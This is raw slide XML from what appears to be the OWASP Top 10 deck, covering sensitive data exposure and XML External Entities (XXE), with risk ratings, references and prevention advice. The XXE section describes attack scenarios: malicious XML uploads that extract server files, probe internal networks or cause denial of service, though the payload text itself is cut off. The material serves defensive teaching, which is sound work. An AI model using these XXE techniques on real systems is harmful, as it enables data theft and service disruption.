                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>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Cheat Sheet: Password Storage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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: 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Security Headers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0" smtClean="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smtClean="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3"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE-359: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Exposure of Private Information (Privacy Violation)</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>CWE-220: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Exposure of sens. information through data queries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6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-310: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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7"/>
              </a:rPr>
              <a:t>CWE-326 Weak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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-312: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-319: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Cleartext Transmission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Classify data processed, stored or transmitted by a system. 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Review the privacy laws or regulations applicable to sensitive data, and protect as per regulatory requirements.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Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data you don’t retain can’t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Make sure you encrypt all sensitive data at rest </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Encrypt all data in transit, such as using TLS. Enforce this using directives like HTTP Strict Transport Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>HSTS</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up-to-date and strong standard algorithms or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ciphers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>parameters, protocols and keys are used, and proper key management is in place. Consider using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>crypto modules</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Store passwords using strong adaptive algorithms appropriate for password protection, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Argon2</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22"/>
              </a:rPr>
              <a:t>scrypt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23"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, with sufficient work factor (delay factor) to prevent realistic GPU cracking attacks.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caching for response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Verify independently the effectiveness of your settings.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2812243926"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957600"/>
          <a:ext cx="6861600" cy="215772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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5580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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</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kern="1200" baseline="0" dirty="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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</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2"/>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r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Even anonymous attackers typically don’t break crypto directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manual attack is generally required.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data at rest. Both with very varying exploitability.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive personal information (PII) data such as health records, cre-dentials, personal data, credit cards, which often requires protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Numerous public XXE issues have been discovered, including attacking embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The easiest way is to upload a malicious XML file, if accepted:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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attacker  attempts to extract data from the server:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?xml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probes the server's private network by changing the above ENTITY line to:</a:t>
            </a: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An attacker attempts a denial-of-service attack by including a potentially endless file:</a:t>
            </a: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ct val="90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Applications and in particular XML-based web services or downstream integrations might be vulnerable to attack if:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Your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Any of the XML processors in the application or SOAP based web services has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> enabled. As the exact mechanism for disabling DTD processing varies by processor, it is recommended that you consult a reference such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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your application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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SAST tools can help detect XXE in source code, although manual code review is the best alternative in large, complex applications with many integrations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Being vulnerable to XXE attacks likely means that you are vulnerable to other billion laughs denial-of-service attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Guide: Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>for XML Injection</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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE-611: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Developer training is essential to identify and mitigate XXE completely. Besides that, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reventing XXE requires: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FontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patch or upgrade all the latest XML processors and libraries in use by the application or on the underlying operating system. The use of dependency checkers is critical in managing the risk from necessary libraries and components in not only your application, but any downstream integrations.</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Disable XML external entity and DTD processing in all XML parsers in your application, as per the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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Implement positive ("whitelisting") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.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Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Upgrade SOAP to the latest version.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If these controls are not possible, consider using virtual patching, API security gateways, or WAFs to detect, monitor, and block XXE attacks. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans"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solidFill>
            <a:srgbClr val="83276B"/>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251780357"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
